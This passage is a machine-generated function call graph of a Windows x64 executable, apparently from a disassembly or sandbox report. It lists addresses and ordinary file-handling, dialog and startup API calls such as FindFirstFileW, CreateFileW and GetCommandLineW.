calls 27320->27321 27322 7ff6c16be5db 27321->27322 27323 7ff6c16b1fa0 31 API calls 27322->27323 27324 7ff6c16be5e4 27323->27324 27325 7ff6c16b1fa0 31 API calls 27324->27325 27328 7ff6c16be5ed 27325->27328 27326 7ff6c16c18c2 27327 7ff6c16c190d 27326->27327 27329 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27326->27329 27327->26646 27328->27326 27328->27327 27330 7ff6c16b1fa0 31 API calls 27328->27330 27331 7ff6c16c193b 27329->27331 27330->27328 27333 7ff6c16c870a 27332->27333 27334 7ff6c16e21d0 33 API calls 27333->27334 27336 7ff6c16c872f 27334->27336 27335 7ff6c16e21d0 33 API calls 27337 7ff6c16c8759 27335->27337 27336->27335 27337->27278 27339 7ff6c16be627 27338->27339 27342 7ff6c16be62c memcpy_s 27338->27342 27340 7ff6c16b1fa0 31 API calls 27339->27340 27340->27342 27341 7ff6c16b1fa0 31 API calls 27343 7ff6c16be668 memcpy_s 27341->27343 27342->27341 27342->27343 27343->27282 27344->27288 27346 7ff6c16c72cc 8 API calls 27345->27346 27347 7ff6c16c3ee1 27346->27347 27351 7ff6c16c3f0f 27347->27351 27389 7ff6c16c40bc 27347->27389 27350 7ff6c16c3efa FindClose 27350->27351 27351->27299 27353 7ff6c16bf598 _snwprintf 27352->27353 27428 7ff6c16b2950 27353->27428 27356 7ff6c16bf5cc 27360 7ff6c16bf5fc 27356->27360 27443 7ff6c16b33e4 27356->27443 27359 7ff6c16bf5f8 27359->27360 27475 7ff6c16b3ad8 27359->27475 27694 7ff6c16b2c54 27360->27694 27367 7ff6c16bf7cb 27485 7ff6c16bf8a4 27367->27485 27369 7ff6c16b8d04 33 API calls 27370 7ff6c16bf662 27369->27370 27714 7ff6c16c7918 48 API calls 2 library calls 27370->27714 27372 7ff6c16bf677 27373 7ff6c16c3ec8 55 API calls 27372->27373 27380 7ff6c16bf6ad 27373->27380 27375 7ff6c16bf842 27375->27360 27506 7ff6c16b69f8 27375->27506 27517 7ff6c16bf930 27375->27517 27381 7ff6c16bf89a 27380->27381 27382 7ff6c16bf74d 27380->27382 27383 7ff6c16c3ec8 55 API calls 27380->27383 27715 7ff6c16c7918 48 API calls 2 library calls 27380->27715 27384 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27381->27384 27382->27367 27382->27381 27385 7ff6c16bf895 27382->27385 27383->27380 27387 7ff6c16bf8a0 27384->27387 27386 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27385->27386 27386->27381 27388->27308 27390 7ff6c16c41d2 FindNextFileW 27389->27390 27391 7ff6c16c40f9 FindFirstFileW 27389->27391 27393 7ff6c16c41e1 GetLastError 27390->27393 27394 7ff6c16c41f3 27390->27394 27391->27394 27395 7ff6c16c411e 27391->27395 27414 7ff6c16c41c0 27393->27414 27398 7ff6c16b20b0 33 API calls 27394->27398 27400 7ff6c16c4211 27394->27400 27396 7ff6c16c6a0c 49 API calls 27395->27396 27397 7ff6c16c4144 27396->27397 27403 7ff6c16c4148 FindFirstFileW 27397->27403 27404 7ff6c16c4167 27397->27404 27398->27400 27399 7ff6c16e2320 _handle_error 8 API calls 27401 7ff6c16c3ef4 27399->27401 27402 7ff6c16b129c 33 API calls 27400->27402 27401->27350 27401->27351 27405 7ff6c16c423b 27402->27405 27403->27404 27404->27394 27407 7ff6c16c41af GetLastError 27404->27407 27409 7ff6c16c4314 27404->27409 27415 7ff6c16c8090 27405->27415 27407->27414 27410 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27409->27410 27411 7ff6c16c431a 27410->27411 27412 7ff6c16c430f 27413 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27412->27413 27413->27409 27414->27399 27416 7ff6c16c80a5 27415->27416 27419 7ff6c16c8188 27416->27419 27418 7ff6c16c4249 27418->27412 27418->27414 27420 7ff6c16c8326 27419->27420 27422 7ff6c16c81ba 27419->27422 27427 7ff6c16b704c 47 API calls memcpy_s 27420->27427 27425 7ff6c16c81d4 memcpy_s 27422->27425 27426 7ff6c16c58a4 33 API calls 2 library calls 27422->27426 27423 7ff6c16c832b 27425->27418 27426->27425 27427->27423 27429 7ff6c16b296c 27428->27429 27430 7ff6c16c86ec 33 API calls 27429->27430 27431 7ff6c16b298d 27430->27431 27432 7ff6c16e21d0 33 API calls 27431->27432 27436 7ff6c16b2ac2 27431->27436 27434 7ff6c16b2ab0 27432->27434 27434->27436 27716 7ff6c16b91c8 27434->27716 27723 7ff6c16c4d04 27436->27723 27438 7ff6c16c2ca8 27755 7ff6c16c24c0 27438->27755 27441 7ff6c16c2cc5 27441->27356 27774 7ff6c16c28d0 27443->27774 27444 7ff6c16b344e 27446 7ff6c16b3674 27444->27446 27451 7ff6c16b3682 27444->27451 27445 7ff6c16b3431 memcpy_s 27445->27444 27448 7ff6c16b3601 27445->27448 27779 7ff6c16c2bb0 27445->27779 27793 7ff6c16b28a4 82 API calls 2 library calls 27446->27793 27448->27359 27449 7ff6c16b69f8 132 API calls 27449->27451 27451->27448 27451->27449 27453 7ff6c16b370c 27451->27453 27467 7ff6c16c2aa0 101 API calls 27451->27467 27452 7ff6c16b3740 27452->27448 27456 7ff6c16b384d 27452->27456 27466 7ff6c16c2bb0 101 API calls 27452->27466 27453->27448 27453->27452 27794 7ff6c16b28a4 82 API calls 2 library calls 27453->27794 27455 7ff6c16b35d7 27455->27448 27458 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27455->27458 27456->27448 27459 7ff6c16b20b0 33 API calls 27456->27459 27457 7ff6c16b35cb 27457->27444 27457->27455 27460 7ff6c16b3891 27458->27460 27459->27448 27460->27359 27461 7ff6c16b34eb 27461->27457 27788 7ff6c16c2aa0 27461->27788 27462 7ff6c16b69f8 132 API calls 27464 7ff6c16b378e 27462->27464 27464->27462 27465 7ff6c16b3803 27464->27465 27469 7ff6c16c2aa0 101 API calls 27464->27469 27473 7ff6c16c2aa0 101 API calls 27465->27473 27466->27464 27467->27451 27468 7ff6c16c28d0 104 API calls 27468->27457 27469->27464 27473->27456 27474 7ff6c16c28d0 104 API calls 27474->27461 27476 7ff6c16b3af9 27475->27476 27482 7ff6c16b3b55 27475->27482 27806 7ff6c16b3378 27476->27806 27478 7ff6c16e2320 _handle_error 8 API calls 27480 7ff6c16b3b67 27478->27480 27480->27367 27480->27369 27481 7ff6c16b3b6c 27483 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27481->27483 27482->27478 27484 7ff6c16b3b71 27483->27484 28032 7ff6c16c886c 27485->28032 27487 7ff6c16bf8ba 28036 7ff6c16cef60 GetSystemTime SystemTimeToFileTime 27487->28036 27490 7ff6c16d0994 27491 7ff6c16e0340 27490->27491 27492 7ff6c16c7df4 47 API calls 27491->27492 27493 7ff6c16e0373 27492->27493 27494 7ff6c16caae0 48 API calls 27493->27494 27495 7ff6c16e0387 27494->27495 27496 7ff6c16cda98 48 API calls 27495->27496 27497 7ff6c16e0397 27496->27497 27498 7ff6c16b1fa0 31 API calls 27497->27498 27499 7ff6c16e03a2 27498->27499 28045 7ff6c16dfc68 49 API calls 2 library calls 27499->28045 27501 7ff6c16e03b8 27502 7ff6c16b1fa0 31 API calls 27501->27502 27503 7ff6c16e03c3 27502->27503 27504 7ff6c16e2320 _handle_error 8 API calls 27503->27504 27507 7ff6c16b6a0e 27506->27507 27512 7ff6c16b6a0a 27506->27512 27516 7ff6c16c2bb0 101 API calls 27507->27516 27508 7ff6c16b6a1b 27509 7ff6c16b6a3e 27508->27509 27510 7ff6c16b6a2f 27508->27510 28108 7ff6c16b5130 130 API calls 2 library calls 27509->28108 27510->27512 28046 7ff6c16b5e24 27510->28046 27512->27375 27514 7ff6c16b6a3c 27514->27512 28109 7ff6c16b466c 82 API calls 27514->28109 27516->27508 27518 7ff6c16bf978 27517->27518 27521 7ff6c16bf9b0 27518->27521 27577 7ff6c16bfa34 27518->27577 28217 7ff6c16d612c 137 API calls 3 library calls 27518->28217 27520 7ff6c16c1189 27522 7ff6c16c11e1 27520->27522 27523 7ff6c16c118e 27520->27523 27521->27520 27528 7ff6c16bf9d0 27521->27528 27521->27577 27522->27577 28267 7ff6c16d612c 137 API calls 3 library calls 27522->28267 27523->27577 28266 7ff6c16bdd08 179 API calls 27523->28266 27524 7ff6c16e2320 _handle_error 8 API calls 27525 7ff6c16c11c4 27524->27525 27525->27375 27528->27577 28138 7ff6c16b9bb0 27528->28138 27530 7ff6c16bfad6 28151 7ff6c16c5ef8 27530->28151 27577->27524 27695 7ff6c16b2c74 27694->27695 27699 7ff6c16b2c88 27694->27699 27695->27699 28384 7ff6c16b2d80 108 API calls _invalid_parameter_noinfo_noreturn 27695->28384 27696 7ff6c16b1fa0 31 API calls 27702 7ff6c16b2ca1 27696->27702 27699->27696 27700 7ff6c16b2d08 27703 7ff6c16b3090 31 API calls 27700->27703 27701 7ff6c16b2d64 27704 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27701->27704 27702->27701 28362 7ff6c16b3090 27702->28362 27705 7ff6c16b2d14 27703->27705 27706 7ff6c16b2d7c 27704->27706 27707 7ff6c16b1fa0 31 API calls 27705->27707 27708 7ff6c16b2d20 27707->27708 28370 7ff6c16c878c 27708->28370 27714->27372 27715->27380 27733 7ff6c16c56a4 27716->27733 27718 7ff6c16b91df 27736 7ff6c16cb788 27718->27736 27722 7ff6c16b9383 27722->27436 27724 7ff6c16c4d32 memcpy_s 27723->27724 27751 7ff6c16c4bac 27724->27751 27726 7ff6c16c4d54 27727 7ff6c16c4d90 27726->27727 27729 7ff6c16c4dae 27726->27729 27728 7ff6c16e2320 _handle_error 8 API calls 27727->27728 27730 7ff6c16b2b32 27728->27730 27731 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27729->27731 27730->27356 27730->27438 27732 7ff6c16c4db3 27731->27732 27742 7ff6c16c56e8 27733->27742 27737 7ff6c16b13a4 33 API calls 27736->27737 27738 7ff6c16b9365 27737->27738 27739 7ff6c16b9a28 27738->27739 27740 7ff6c16c56e8 2 API calls 27739->27740 27741 7ff6c16b9a36 27740->27741 27741->27722 27743 7ff6c16c56fe memcpy_s 27742->27743 27746 7ff6c16ceba4 27743->27746 27749 7ff6c16ceb58 GetCurrentProcess GetProcessAffinityMask 27746->27749 27750 7ff6c16c56de 27749->27750 27750->27718 27752 7ff6c16c4c27 27751->27752 27754 7ff6c16c4c2f memcpy_s 27751->27754 27753 7ff6c16b1fa0 31 API calls 27752->27753 27753->27754 27754->27726 27756 7ff6c16c24fd CreateFileW 27755->27756 27758 7ff6c16c25ae GetLastError 27756->27758 27761 7ff6c16c266e 27756->27761 27759 7ff6c16c6a0c 49 API calls 27758->27759 27760 7ff6c16c25dc 27759->27760 27762 7ff6c16c25e0 CreateFileW GetLastError 27760->27762 27767 7ff6c16c262c 27760->27767 27763 7ff6c16c26b1 SetFileTime 27761->27763 27765 7ff6c16c26cf 27761->27765 27762->27767 27763->27765 27764 7ff6c16e2320 _handle_error 8 API calls 27768 7ff6c16c271b 27764->27768 27766 7ff6c16c2708 27765->27766 27770 7ff6c16b20b0 33 API calls 27765->27770 27766->27764 27767->27761 27769 7ff6c16c2736 27767->27769 27768->27441 27773 7ff6c16bb7e8 99 API calls 2 library calls 27768->27773 27771 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27769->27771 27770->27766 27772 7ff6c16c273b 27771->27772 27773->27441 27776 7ff6c16c28f6 27774->27776 27777 7ff6c16c28fd 27774->27777 27775 7ff6c16c2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27775->27777 27776->27445 27777->27775 27777->27776 27795 7ff6c16bb8a4 99 API calls std::_Xinvalid_argument 27777->27795 27780 7ff6c16c2bcd 27779->27780 27781 7ff6c16c2be9 27779->27781 27782 7ff6c16b34cc 27780->27782 27796 7ff6c16bb9c4 99 API calls std::_Xinvalid_argument 27780->27796 27781->27782 27784 7ff6c16c2c01 SetFilePointer 27781->27784 27782->27474 27784->27782 27785 7ff6c16c2c1e GetLastError 27784->27785 27785->27782 27786 7ff6c16c2c28 27785->27786 27786->27782 27797 7ff6c16bb9c4 99 API calls std::_Xinvalid_argument 27786->27797 27798 7ff6c16c2778 27788->27798 27791 7ff6c16b35a7 27791->27457 27791->27468 27793->27448 27794->27452 27799 7ff6c16c2789 _snwprintf 27798->27799 27800 7ff6c16c2890 SetFilePointer 27799->27800 27804 7ff6c16c27b5 27799->27804 27803 7ff6c16c28b8 GetLastError 27800->27803 27800->27804 27801 7ff6c16e2320 _handle_error 8 API calls 27802 7ff6c16c281d 27801->27802 27802->27791 27805 7ff6c16bb9c4 99 API calls std::_Xinvalid_argument 27802->27805 27803->27804 27804->27801 27807 7ff6c16b339a 27806->27807 27810 7ff6c16b3396 27806->27810 27812 7ff6c16b3294 27807->27812 27810->27481 27810->27482 27811 7ff6c16c2aa0 101 API calls 27811->27810 27813 7ff6c16b32bb 27812->27813 27815 7ff6c16b32f6 27812->27815 27814 7ff6c16b69f8 132 API calls 27813->27814 27818 7ff6c16b32db 27814->27818 27820 7ff6c16b6e74 27815->27820 27818->27811 27824 7ff6c16b6e95 27820->27824 27821 7ff6c16b69f8 132 API calls 27821->27824 27822 7ff6c16b331d 27822->27818 27825 7ff6c16b3904 27822->27825 27824->27821 27824->27822 27852 7ff6c16ce808 27824->27852 27860 7ff6c16b6a7c 27825->27860 27828 7ff6c16b396a 27832 7ff6c16b3989 27828->27832 27833 7ff6c16b399a 27828->27833 27829 7ff6c16b3a8a 27834 7ff6c16e2320 _handle_error 8 API calls 27829->27834 27831 7ff6c16b394f 27831->27829 27835 7ff6c16b3ab3 27831->27835 27842 7ff6c16b3ab8 27831->27842 27892 7ff6c16d0d54 27832->27892 27838 7ff6c16b39a3 27833->27838 27839 7ff6c16b39ec 27833->27839 27837 7ff6c16b3a9e 27834->27837 27840 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27835->27840 27837->27818 27897 7ff6c16d0c80 33 API calls 27838->27897 27898 7ff6c16b26b4 33 API calls memcpy_s 27839->27898 27840->27842 27847 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27842->27847 27843 7ff6c16b39b0 27848 7ff6c16b1fa0 31 API calls 27843->27848 27851 7ff6c16b39c0 memcpy_s 27843->27851 27845 7ff6c16b1fa0 31 API calls 27845->27831 27846 7ff6c16b3a13 27899 7ff6c16d0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27846->27899 27850 7ff6c16b3abe 27847->27850 27848->27851 27851->27845 27853 7ff6c16ce811 27852->27853 27855 7ff6c16ce82b 27853->27855 27858 7ff6c16bb664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27853->27858 27856 7ff6c16ce845 SetThreadExecutionState 27855->27856 27859 7ff6c16bb664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27855->27859 27858->27855 27859->27856 27861 7ff6c16b6a96 _snwprintf 27860->27861 27862 7ff6c16b6ae4 27861->27862 27863 7ff6c16b6ac4 27861->27863 27865 7ff6c16b6d4d 27862->27865 27868 7ff6c16b6b0f 27862->27868 27938 7ff6c16b28a4 82 API calls 2 library calls 27863->27938 27967 7ff6c16b28a4 82 API calls 2 library calls 27865->27967 27867 7ff6c16b6ad0 27869 7ff6c16e2320 _handle_error 8 API calls 27867->27869 27868->27867 27900 7ff6c16d1f94 27868->27900 27870 7ff6c16b394b 27869->27870 27870->27828 27870->27831 27896 7ff6c16b2794 33 API calls __std_swap_ranges_trivially_swappable 27870->27896 27873 7ff6c16b6b85 27874 7ff6c16b6c2a 27873->27874 27891 7ff6c16b6b7b 27873->27891 27944 7ff6c16c8968 109 API calls 27873->27944 27909 7ff6c16c4760 27874->27909 27875 7ff6c16b6b80 27875->27873 27940 7ff6c16b40b0 27875->27940 27876 7ff6c16b6b6e 27939 7ff6c16b28a4 82 API calls 2 library calls 27876->27939 27882 7ff6c16b6c52 27883 7ff6c16b6cd1 27882->27883 27884 7ff6c16b6cc7 27882->27884 27945 7ff6c16d1f20 27883->27945 27913 7ff6c16c1794 27884->27913 27887 7ff6c16b6ccf 27928 7ff6c16d1870 27891->27928 27894 7ff6c16d0d8c 27892->27894 27893 7ff6c16d0f48 27893->27831 27894->27893 27895 7ff6c16b1744 33 API calls 27894->27895 27895->27894 27896->27828 27897->27843 27898->27846 27899->27831 27901 7ff6c16d2056 std::bad_alloc::bad_alloc 27900->27901 27904 7ff6c16d1fc5 std::bad_alloc::bad_alloc 27900->27904 27903 7ff6c16e4078 std::_Xinvalid_argument 2 API calls 27901->27903 27902 7ff6c16b6b59 27902->27873 27902->27875 27902->27876 27903->27904 27904->27902 27905 7ff6c16e4078 std::_Xinvalid_argument 2 API calls 27904->27905 27906 7ff6c16d200f std::bad_alloc::bad_alloc 27904->27906 27905->27906 27906->27902 27907 7ff6c16e4078 std::_Xinvalid_argument 2 API calls 27906->27907 27908 7ff6c16d20a9 27907->27908 27910 7ff6c16c4780 27909->27910 27912 7ff6c16c478a 27909->27912 27911 7ff6c16e21d0 33 API calls 27910->27911 27911->27912 27912->27882 27914 7ff6c16c17be memcpy_s 27913->27914 27968 7ff6c16c8a48 27914->27968 27929 7ff6c16d188e 27928->27929 27931 7ff6c16d18a1 27929->27931 27984 7ff6c16ce948 27929->27984 27935 7ff6c16d18d8 27931->27935 27991 7ff6c16e236c 27931->27991 27933 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27934 7ff6c16d1ad0 27933->27934 27937 7ff6c16d1a37 27935->27937 27995 7ff6c16ca984 31 API calls _invalid_parameter_noinfo_noreturn 27935->27995 27937->27933 27938->27867 27939->27891 27941 7ff6c16b40dd 27940->27941 27942 7ff6c16b40d7 memcpy_s 27940->27942 27941->27942 27996 7ff6c16b4120 27941->27996 27942->27873 27944->27874 27946 7ff6c16d1f29 27945->27946 27947 7ff6c16d1f5d 27946->27947 27948 7ff6c16d1f55 27946->27948 27949 7ff6c16d1f49 27946->27949 27947->27887 28023 7ff6c16d3964 151 API calls 27948->28023 28002 7ff6c16d20ac 27949->28002 27967->27867 27969 7ff6c16c8bcd 27968->27969 27974 7ff6c16c8a91 memcpy_s 27968->27974 27974->27969 27985 7ff6c16cecd8 103 API calls 27984->27985 27986 7ff6c16ce95f ReleaseSemaphore 27985->27986 27987 7ff6c16ce9a3 DeleteCriticalSection CloseHandle CloseHandle 27986->27987 27988 7ff6c16ce984 27986->27988 27989 7ff6c16cea5c 101 API calls 27988->27989 27990 7ff6c16ce98e FindCloseChangeNotification 27989->27990 27990->27987 27990->27988 27992 7ff6c16e239f 27991->27992 27993 7ff6c16e23c8 27992->27993 27994 7ff6c16d1870 108 API calls 27992->27994 27993->27935 27994->27992 27995->27937 27999 7ff6c16b4149 27996->27999 28001 7ff6c16b4168 memcpy_s __std_swap_ranges_trivially_swappable 27996->28001 27997 7ff6c16b2018 33 API calls 27998 7ff6c16b41eb 27997->27998 28000 7ff6c16e21d0 33 API calls 27999->28000 27999->28001 28000->28001 28001->27997 28023->27947 28033 7ff6c16c8882 28032->28033 28034 7ff6c16c8892 28032->28034 28039 7ff6c16c23f0 28033->28039 28034->27487 28037 7ff6c16e2320 _handle_error 8 API calls 28036->28037 28038 7ff6c16bf7dc 28037->28038 28038->27375 28038->27490 28040 7ff6c16c240f 28039->28040 28043 7ff6c16c2aa0 101 API calls 28040->28043 28041 7ff6c16c2428 28044 7ff6c16c2bb0 101 API calls 28041->28044 28042 7ff6c16c2438 28042->28034 28043->28041 28044->28042 28045->27501 28047 7ff6c16b5e67 28046->28047 28110 7ff6c16c85f0 28047->28110 28049 7ff6c16b6134 28120 7ff6c16b6fcc 82 API calls 28049->28120 28054 7ff6c16b6973 28132 7ff6c16b466c 82 API calls 28054->28132 28056 7ff6c16b612e 28056->28049 28056->28054 28060 7ff6c16c85f0 104 API calls 28056->28060 28062 7ff6c16b61a4 28060->28062 28062->28049 28104 7ff6c16b613c 28108->27514 28111 7ff6c16c8614 28110->28111 28112 7ff6c16c869a 28110->28112 28113 7ff6c16c867c 28111->28113 28114 7ff6c16b40b0 33 API calls 28111->28114 28112->28113 28115 7ff6c16b40b0 33 API calls 28112->28115 28113->28056 28116 7ff6c16c864d 28114->28116 28117 7ff6c16c86b3 28115->28117 28133 7ff6c16ba174 28116->28133 28119 7ff6c16c28d0 104 API calls 28117->28119 28119->28113 28120->28104 28134 7ff6c16ba185 28133->28134 28135 7ff6c16ba19a 28134->28135 28137 7ff6c16caf18 8 API calls 2 library calls 28134->28137 28135->28113 28137->28135 28146 7ff6c16b9be7 28138->28146 28139 7ff6c16b9c1b 28140 7ff6c16e2320 _handle_error 8 API calls 28139->28140 28141 7ff6c16b9c9d 28140->28141 28141->27530 28143 7ff6c16b9c83 28144 7ff6c16b1fa0 31 API calls 28143->28144 28144->28139 28146->28139 28146->28143 28147 7ff6c16b9cae 28146->28147 28268 7ff6c16c5294 28146->28268 28288 7ff6c16cdb60 28146->28288 28148 7ff6c16b9cbf 28147->28148 28292 7ff6c16cda48 CompareStringW 28147->28292 28148->28143 28150 7ff6c16b20b0 33 API calls 28148->28150 28150->28143 28152 7ff6c16c5f3a 28151->28152 28156 7ff6c16b129c 33 API calls 28152->28156 28162 7ff6c16c619b 28152->28162 28164 7ff6c16c61ce 28152->28164 28153 7ff6c16e2320 _handle_error 8 API calls 28162->28153 28302 7ff6c16b704c 47 API calls memcpy_s 28164->28302 28217->27521 28266->27577 28267->27577 28270 7ff6c16c52d4 28268->28270 28274 7ff6c16c539e __vcrt_FlsAlloc 28270->28274 28275 7ff6c16c5312 __vcrt_FlsAlloc 28270->28275 28299 7ff6c16d13f4 CompareStringW 28270->28299 28271 7ff6c16e2320 _handle_error 8 API calls 28272 7ff6c16c5503 28271->28272 28272->28146 28276 7ff6c16c5339 28274->28276 28293 7ff6c16c5524 28274->28293 28275->28276 28278 7ff6c16c5382 __vcrt_FlsAlloc 28275->28278 28300 7ff6c16d13f4 CompareStringW 28275->28300 28276->28271 28278->28274 28278->28276 28279 7ff6c16c5439 28278->28279 28280 7ff6c16b129c 33 API calls 28278->28280 28283 7ff6c16c551b 28279->28283 28284 7ff6c16c5489 28279->28284 28281 7ff6c16c5426 28280->28281 28282 7ff6c16c72cc 8 API calls 28281->28282 28282->28279 28286 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28283->28286 28284->28274 28284->28276 28301 7ff6c16d13f4 CompareStringW 28284->28301 28289 7ff6c16cdb73 28288->28289 28290 7ff6c16b20b0 33 API calls 28289->28290 28291 7ff6c16cdb91 28289->28291 28290->28291 28291->28146 28292->28148 28295 7ff6c16c5550 28293->28295 28294 7ff6c16d13b8 CharUpperW 28294->28295 28295->28294 28297 7ff6c16c55bf 28295->28297 28298 7ff6c16c55fd 28295->28298 28296 7ff6c16c5524 CharUpperW 28296->28297 28297->28296 28297->28298 28298->28276 28299->28275 28300->28278 28301->28274 28363 7ff6c16b1fa0 31 API calls 28362->28363 28364 7ff6c16b30a5 28363->28364 28365 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28364->28365 28366 7ff6c16b30fd 28365->28366 28367 7ff6c16cb825 28366->28367 28368 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28366->28368 28367->27700 28369 7ff6c16cb846 28368->28369 28371 7ff6c16c87af 28370->28371 28373 7ff6c16c87df 28370->28373 28372 7ff6c16e236c 108 API calls 28371->28372 28375 7ff6c16c87ca 28372->28375 28376 7ff6c16e236c 108 API calls 28373->28376 28382 7ff6c16c882b 28373->28382 28379 7ff6c16e236c 108 API calls 28375->28379 28377 7ff6c16c8814 28376->28377 28380 7ff6c16e236c 108 API calls 28377->28380 28378 7ff6c16c8845 28381 7ff6c16c461c 108 API calls 28378->28381 28379->28373 28380->28382 28383 7ff6c16c8851 28381->28383 28385 7ff6c16c461c 28382->28385 28384->27699 28386 7ff6c16c4632 28385->28386 28388 7ff6c16c463a 28385->28388 28387 7ff6c16ce948 108 API calls 28386->28387 28387->28388 28388->28378 28390 7ff6c16c1681 28389->28390 28392 7ff6c16c163e 28389->28392 28393 7ff6c16b1fa0 31 API calls 28390->28393 28396 7ff6c16c16a0 28390->28396 28391 7ff6c16be600 31 API calls 28398 7ff6c16c16de 28391->28398 28392->28390 28394 7ff6c16c31bc 51 API calls 28392->28394 28393->28390 28394->28392 28395 7ff6c16c175b 28399 7ff6c16e2320 _handle_error 8 API calls 28395->28399 28396->28391 28397 7ff6c16c178d 28400 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28397->28400 28398->28395 28398->28397 28401 7ff6c16be58a 28399->28401 28402 7ff6c16c1792 28400->28402 28401->27313 28401->27314 28404 7ff6c16d84cc 4 API calls 28403->28404 28405 7ff6c16d84aa 28404->28405 28406 7ff6c16d84b9 28405->28406 28415 7ff6c16d8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28405->28415 28406->26653 28406->26654 28408->26659 28409->26665 28411 7ff6c16d84de 28410->28411 28412 7ff6c16d84e3 28410->28412 28416 7ff6c16d8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28411->28416 28412->26665 28414->26668 28415->28406 28416->28412 28417->26694 28419->26718 28420->26734 28421->26741 28423->26746 28425 7ff6c16e03e0 28426 7ff6c16e041f 28425->28426 28427 7ff6c16e0497 28425->28427 28428 7ff6c16caae0 48 API calls 28426->28428 28429 7ff6c16caae0 48 API calls 28427->28429 28430 7ff6c16e0433 28428->28430 28431 7ff6c16e04ab 28429->28431 28432 7ff6c16cda98 48 API calls 28430->28432 28433 7ff6c16cda98 48 API calls 28431->28433 28437 7ff6c16e0442 memcpy_s 28432->28437 28433->28437 28434 7ff6c16b1fa0 31 API calls 28435 7ff6c16e0541 28434->28435 28439 7ff6c16b250c SetDlgItemTextW 28435->28439 28436 7ff6c16e05cc 28441 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28436->28441 28437->28434 28437->28436 28438 7ff6c16e05c6 28437->28438 28440 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28438->28440 28442 7ff6c16e0556 SetDlgItemTextW 28439->28442 28440->28436 28443 7ff6c16e05d2 28441->28443 28444 7ff6c16e056f 28442->28444 28445 7ff6c16e059c 28442->28445 28444->28445 28447 7ff6c16e05c1 28444->28447 28446 7ff6c16e2320 _handle_error 8 API calls 28445->28446 28448 7ff6c16e05af 28446->28448 28449 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28447->28449 28449->28438 28450 7ff6c16ebf2c 28457 7ff6c16ebc34 28450->28457 28462 7ff6c16ed440 35 API calls 2 library calls 28457->28462 28459 7ff6c16ebc3f 28463 7ff6c16ed068 35 API calls abort 28459->28463 28462->28459 28464 7ff6c16ed94c 28465 7ff6c16ed997 28464->28465 28469 7ff6c16ed95b abort 28464->28469 28471 7ff6c16ed69c 15 API calls abort 28465->28471 28467 7ff6c16ed97e RtlAllocateHeap 28468 7ff6c16ed995 28467->28468 28467->28469 28469->28465 28469->28467 28470 7ff6c16ebbc0 abort 2 API calls 28469->28470 28470->28469 28471->28468 28472 7ff6c16e154b 28473 7ff6c16e14a2 28472->28473 28474 7ff6c16e1900 _com_raise_error 14 API calls 28473->28474 28475 7ff6c16e14e1 28474->28475 28476 7ff6c16e2d6c 28501 7ff6c16e27fc 28476->28501 28479 7ff6c16e2eb8 28599 7ff6c16e3170 7 API calls 2 library calls 28479->28599 28480 7ff6c16e2d88 __scrt_acquire_startup_lock 28482 7ff6c16e2ec2 28480->28482 28484 7ff6c16e2da6 28480->28484 28600 7ff6c16e3170 7 API calls 2 library calls 28482->28600 28485 7ff6c16e2dcb 28484->28485 28489 7ff6c16e2de8 __scrt_release_startup_lock 28484->28489 28509 7ff6c16ecd90 28484->28509 28486 7ff6c16e2ecd abort 28488 7ff6c16e2e51 28513 7ff6c16e32bc 28488->28513 28489->28488 28596 7ff6c16ec050 35 API calls __GSHandlerCheck_EH 28489->28596 28491 7ff6c16e2e56 28516 7ff6c16ecd20 28491->28516 28601 7ff6c16e2fb0 28501->28601 28504 7ff6c16e282b 28603 7ff6c16ecc50 28504->28603 28508 7ff6c16e2827 28508->28479 28508->28480 28510 7ff6c16ecdcc 28509->28510 28511 7ff6c16ecdeb 28509->28511 28510->28511 28620 7ff6c16b1120 28510->28620 28511->28489 28514 7ff6c16e3cf0 memcpy_s 28513->28514 28515 7ff6c16e32d3 GetStartupInfoW 28514->28515 28515->28491 28626 7ff6c16f0730 28516->28626 28518 7ff6c16ecd2f 28520 7ff6c16e2e5e 28518->28520 28630 7ff6c16f0ac0 35 API calls swprintf 28518->28630 28521 7ff6c16e0754 28520->28521 28632 7ff6c16cdfd0 28521->28632 28524 7ff6c16c62dc 35 API calls 28525 7ff6c16e079a 28524->28525 28709 7ff6c16d946c 28525->28709 28527 7ff6c16e07a4 memcpy_s 28714 7ff6c16d9a14 28527->28714 28529 7ff6c16e0819 28530 7ff6c16e096e GetCommandLineW 28529->28530 28578 7ff6c16e0ddc 28529->28578 28535 7ff6c16e0980 28530->28535 28571 7ff6c16e0b42 28530->28571 28531 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28532 7ff6c16e0de2 28531->28532 28534 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28532->28534 28533 7ff6c16c6454 34 API calls 28536 7ff6c16e0b51 28533->28536 28547 7ff6c16e0de8 28534->28547 28537 7ff6c16b129c 33 API calls 28535->28537 28538 7ff6c16b1fa0 31 API calls 28536->28538 28542 7ff6c16e0b68 memcpy_s 28536->28542 28540 7ff6c16e09a5 